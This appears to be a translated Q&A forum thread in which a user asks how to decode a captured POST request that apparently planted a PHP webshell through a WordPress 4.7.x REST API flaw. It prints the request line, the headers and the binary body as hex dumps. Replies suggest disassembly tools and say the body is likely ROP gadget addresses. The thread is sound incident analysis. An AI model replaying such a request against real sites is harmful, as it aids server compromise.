我有一个生成PHP Webshel​​l的POST请求。它利用了WordPress版本4.7.0和4.7.1中的REST API漏洞。请求的主体是二进制的(可能是gzip压缩的)。它也与ROP链非常相似,因为地址看起来足够高,足以成为系统dll。

如何获取请求正文中包含的可读数据?

这是请求正文的十六进制转储:

0000000 0400 0000 0000 0000 0000 0000 0000 0000
0000010 4000 09e7 07d8 007f 0600 0000 ff00 ffff
0000020 b0ff 05af 07d8 007f 0400 0000 0000 0000
0000030 0000 0000 0000 0000 4000 00d5 07d8 007f
0000040 0500 0000 1e00 1e73 1065 00d5 07d8 007f
0000050 0400 0000 1e00 1e72 006f 0000 0000 0000
0000060 4000 0bbd 07d8 007f 0600 0000 0900 6a1d
0000070 801d 0f00 07d8 007f 0400 0000 1d00 7767
0000080 d800 076f 07d8 007f 0000 09e3 07d8 007f
0000090 0400 0000 6800 741d f01d 0ba4 07d8 007f
00000a0 0400 0000 0900 661d e81d 076e 07d8 007f
00000b0 b000 09e2 07d8 007f 0400 0000 6d00 6c1d
00000c0 9077 0ba4 07d8 007f 0400 0000 0000 0000
00000d0 7000 076e 07d8 007f 8000 085b 07d8 007f
00000e0 0600 0000 0000 0000 b000 0f00 07d8 007f
00000f0 0400 0000 0000 1e27 002d 0000 0000 0000
0000100 1000 07fb 07d8 007f 0600 0000 0000 0000
0000110 d000 0ba7 07d8 007f 0400 0000 0700 007f
0000120 0000 0000 0000 0000 1000 0ba3 07d8 007f
0000130 0400 0000 1e00 1e72 e06f 0ba2 07d8 007f
0000140 0400 0000 0000 002b 0017 0000 0000 0000
0000150 2000 14a4 07c0 007f 0200 0000 0700 007f
0000160 7000 02a3 07d8 007f 0400 0000 0000 0000
0000170 0000 0000 0000 0000 8000 05a4 07d8 007f
0000180 0500 0000 0000 0000 5000 05a4 07d8 007f
0000190 0400 0000 0000 0000 0000 0000 0000 0000
00001a0 0000 029b 07d8 007f 0500 0000 6300 731d
00001b0 d01d 029a 07d8 007f 0400 0000 0900 6a1d
00001c0 501d 0770 07d8 007f 6000 01ad 07d8 007f
00001d0 0600 0000 6300 6f1d 9077 01ad 07d8 007f
00001e0 0400 0000 6800 741d 801d 076d 07d8 007f
00001f0 a000 119c 07d8 007f 0500 0000 0000 1d09
0000200 c068 03f7 07d8 007f 0400 0000 6d00 6c1d
0000210 0077 0000 0000 0000 b000 09e1 07d8 007f
0000220 0400 0000 0000 0000 5000 0ba3 07d8 007f
0000230 0400 0000 0700 007f 0000 0000 0000 0000
0000240 0000 0f02 07d8 007f 0600 0000 0000 0000
0000250 3000 0f02 07d8 007f 0400 0000 0000 0000
0000260 0000 0000 0000 0000 8000 0ba5 07d8 007f
0000270 0400 0000 1e00 1e73 5065 0ba5 07d8 007f
0000280 0400 0000 1e00 1e72 006f 0000 0000 0000
0000290 8000 00e3 07d8 007f 0500 0000 0000 0000
00002a0 1000 0187 07d8 007f 0400 0000 0000 0000
00002b0 0000 0000 0000 0000 8000 1276 07d8 007f
00002c0 0600 0000 1e00 1e6e 5065 085b 07d8 007f
00002d0 0400 0000 0000 0000 9800 076e 07d8 007f
00002e0 7000 0bbd 07d8 007f 0600 0000 0000 0000
00002f0 a000 0310 07d8 007f 0400 0000 0000 0000
0000300 e800 0769 07d8 007f 7000 00c7 07d8 007f
0000310 0600 0000 0000 0000 b000 00c7 07d8 007f
0000320 0400 0000 1d00 1d6a 0073 0000 0000 0000
0000330 e000 0bbc 07d8 007f 0600 0000 0900 6a1d
0000340 101d 0bbd 07d8 007f 0400 0000 1d00 7767
0000350 f800 076d 07d8 007f a000 01ac 07d8 007f
0000360 0600 0000 6800 741d d01d 01ac 07d8 007f
0000370 0400 0000 0900 661d 001d 0000 0000 0000
0000380 d000 00c6 07d8 007f 0600 0000 6d00 6c1d
0000390 1077 00c7 07d8 007f 0400 0000 7800 8400
00003a0 0000 0000 0000 0000 3000 09e8 07d8 007f
00003b0 0600 0000 0700 007f 1000 0ba8 07d8 007f
00003c0 0400 0000 0000 0000 0000 0000 0000 0000
00003d0 5000 0311 07d8 007f 0600 0000 0000 0000
00003e0 8000 0311 07d8 007f 0400 0000 8500 2700
00003f0 2000 076e 07d8 007f 6000 09e2 07d8 007f
0000400 0400 0000 0000 0000 2000 0ba4 07d8 007f
0000410 0400 0000 0000 1e27 002d 0000 0000 0000
0000420 1000 0185 07d8 007f 0600 0000 0700 007f
0000430 7000 01ac 00d8 000a
0000437


这里是带有-C的十六进制转储:

00000000  00 04 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000010  00 40 e7 09 d8 07 7f 00  00 06 00 00 00 ff ff ff  |.@..............|
00000020  ff b0 af 05 d8 07 7f 00  00 04 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 40 d5 00 d8 07 7f 00  |.........@......|
00000040  00 05 00 00 00 1e 73 1e  65 10 d5 00 d8 07 7f 00  |......s.e.......|
00000050  00 04 00 00 00 1e 72 1e  6f 00 00 00 00 00 00 00  |......r.o.......|
00000060  00 40 bd 0b d8 07 7f 00  00 06 00 00 00 09 1d 6a  |.@.............j|
00000070  1d 80 00 0f d8 07 7f 00  00 04 00 00 00 1d 67 77  |..............gw|
00000080  00 d8 6f 07 d8 07 7f 00  00 00 e3 09 d8 07 7f 00  |..o.............|
00000090  00 04 00 00 00 68 1d 74  1d f0 a4 0b d8 07 7f 00  |.....h.t........|
000000a0  00 04 00 00 00 09 1d 66  1d e8 6e 07 d8 07 7f 00  |.......f..n.....|
000000b0  00 b0 e2 09 d8 07 7f 00  00 04 00 00 00 6d 1d 6c  |.............m.l|
000000c0  77 90 a4 0b d8 07 7f 00  00 04 00 00 00 00 00 00  |w...............|
000000d0  00 70 6e 07 d8 07 7f 00  00 80 5b 08 d8 07 7f 00  |.pn.......[.....|
000000e0  00 06 00 00 00 00 00 00  00 b0 00 0f d8 07 7f 00  |................|
000000f0  00 04 00 00 00 00 27 1e  2d 00 00 00 00 00 00 00  |......'.-.......|
00000100  00 10 fb 07 d8 07 7f 00  00 06 00 00 00 00 00 00  |................|
00000110  00 d0 a7 0b d8 07 7f 00  00 04 00 00 00 07 7f 00  |................|
00000120  00 00 00 00 00 00 00 00  00 10 a3 0b d8 07 7f 00  |................|
00000130  00 04 00 00 00 1e 72 1e  6f e0 a2 0b d8 07 7f 00  |......r.o.......|
00000140  00 04 00 00 00 00 2b 00  17 00 00 00 00 00 00 00  |......+.........|
00000150  00 20 a4 14 c0 07 7f 00  00 02 00 00 00 07 7f 00  |. ..............|
00000160  00 70 a3 02 d8 07 7f 00  00 04 00 00 00 00 00 00  |.p..............|
00000170  00 00 00 00 00 00 00 00  00 80 a4 05 d8 07 7f 00  |................|
00000180  00 05 00 00 00 00 00 00  00 50 a4 05 d8 07 7f 00  |.........P......|
00000190  00 04 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000001a0  00 00 9b 02 d8 07 7f 00  00 05 00 00 00 63 1d 73  |.............c.s|
000001b0  1d d0 9a 02 d8 07 7f 00  00 04 00 00 00 09 1d 6a  |...............j|
000001c0  1d 50 70 07 d8 07 7f 00  00 60 ad 01 d8 07 7f 00  |.Pp......`......|
000001d0  00 06 00 00 00 63 1d 6f  77 90 ad 01 d8 07 7f 00  |.....c.ow.......|
000001e0  00 04 00 00 00 68 1d 74  1d 80 6d 07 d8 07 7f 00  |.....h.t..m.....|
000001f0  00 a0 9c 11 d8 07 7f 00  00 05 00 00 00 00 09 1d  |................|
00000200  68 c0 f7 03 d8 07 7f 00  00 04 00 00 00 6d 1d 6c  |h............m.l|
00000210  77 00 00 00 00 00 00 00  00 b0 e1 09 d8 07 7f 00  |w...............|
00000220  00 04 00 00 00 00 00 00  00 50 a3 0b d8 07 7f 00  |.........P......|
00000230  00 04 00 00 00 07 7f 00  00 00 00 00 00 00 00 00  |................|
00000240  00 00 02 0f d8 07 7f 00  00 06 00 00 00 00 00 00  |................|
00000250  00 30 02 0f d8 07 7f 00  00 04 00 00 00 00 00 00  |.0..............|
00000260  00 00 00 00 00 00 00 00  00 80 a5 0b d8 07 7f 00  |................|
00000270  00 04 00 00 00 1e 73 1e  65 50 a5 0b d8 07 7f 00  |......s.eP......|
00000280  00 04 00 00 00 1e 72 1e  6f 00 00 00 00 00 00 00  |......r.o.......|
00000290  00 80 e3 00 d8 07 7f 00  00 05 00 00 00 00 00 00  |................|
000002a0  00 10 87 01 d8 07 7f 00  00 04 00 00 00 00 00 00  |................|
000002b0  00 00 00 00 00 00 00 00  00 80 76 12 d8 07 7f 00  |..........v.....|
000002c0  00 06 00 00 00 1e 6e 1e  65 50 5b 08 d8 07 7f 00  |......n.eP[.....|
000002d0  00 04 00 00 00 00 00 00  00 98 6e 07 d8 07 7f 00  |..........n.....|
000002e0  00 70 bd 0b d8 07 7f 00  00 06 00 00 00 00 00 00  |.p..............|
000002f0  00 a0 10 03 d8 07 7f 00  00 04 00 00 00 00 00 00  |................|
00000300  00 e8 69 07 d8 07 7f 00  00 70 c7 00 d8 07 7f 00  |..i......p......|
00000310  00 06 00 00 00 00 00 00  00 b0 c7 00 d8 07 7f 00  |................|
00000320  00 04 00 00 00 1d 6a 1d  73 00 00 00 00 00 00 00  |......j.s.......|
00000330  00 e0 bc 0b d8 07 7f 00  00 06 00 00 00 09 1d 6a  |...............j|
00000340  1d 10 bd 0b d8 07 7f 00  00 04 00 00 00 1d 67 77  |..............gw|
00000350  00 f8 6d 07 d8 07 7f 00  00 a0 ac 01 d8 07 7f 00  |..m.............|
00000360  00 06 00 00 00 68 1d 74  1d d0 ac 01 d8 07 7f 00  |.....h.t........|
00000370  00 04 00 00 00 09 1d 66  1d 00 00 00 00 00 00 00  |.......f........|
00000380  00 d0 c6 00 d8 07 7f 00  00 06 00 00 00 6d 1d 6c  |.............m.l|
00000390  77 10 c7 00 d8 07 7f 00  00 04 00 00 00 78 00 84  |w............x..|
000003a0  00 00 00 00 00 00 00 00  00 30 e8 09 d8 07 7f 00  |.........0......|
000003b0  00 06 00 00 00 07 7f 00  00 10 a8 0b d8 07 7f 00  |................|
000003c0  00 04 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000003d0  00 50 11 03 d8 07 7f 00  00 06 00 00 00 00 00 00  |.P..............|
000003e0  00 80 11 03 d8 07 7f 00  00 04 00 00 00 85 00 27  |...............'|
000003f0  00 20 6e 07 d8 07 7f 00  00 60 e2 09 d8 07 7f 00  |. n......`......|
00000400  00 04 00 00 00 00 00 00  00 20 a4 0b d8 07 7f 00  |......... ......|
00000410  00 04 00 00 00 00 27 1e  2d 00 00 00 00 00 00 00  |......'.-.......|
00000420  00 10 85 01 d8 07 7f 00  00 06 00 00 00 07 7f 00  |................|
00000430  00 70 ac 01 d8 00 0a                              |.p.....|
00000437

< br标题(不包括主机名):

POST //wp-json/wp/v2/posts/760 HTTP/1.1

Content-Length: 1077
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-504.23.4.el6.x86_64
Connection: keep-alive
Content-Type: application/json


评论

使用带有-C选项的hexdump打印数据时,hex dump的外观如何?
@SYS_V,将其添加到OP。
如果已知目标应用程序正在运行的系统的ISA,则应该可以反汇编数据块中的指令。您可能可以使用诸如capstone之类的东西来分解网络数据。也可以使用称为ROPgadget的工具。如果您没有运气,请随时发布实际数据,以便其他人可以直接进行分析
我曾尝试使用ROPgadget,但在运行时失败,如下所示:python ROPgadget.py --binary /home/admin/scripts/tester/post.data >
您是否可以使用ROPgadget以外的工具/方法来分解网络数据?

#1 楼

在我看来,有效负载不包含任何指令,而仅包含特定于被利用系统的DLL中现有ROP小工具的地址。尝试在网络服务器进程的内存中查找地址并将其反汇编。或者,附加一个调试器并将断点放在某些可能调用的函数上,以查看它们是如何触发的,然后发布漏洞利用程序。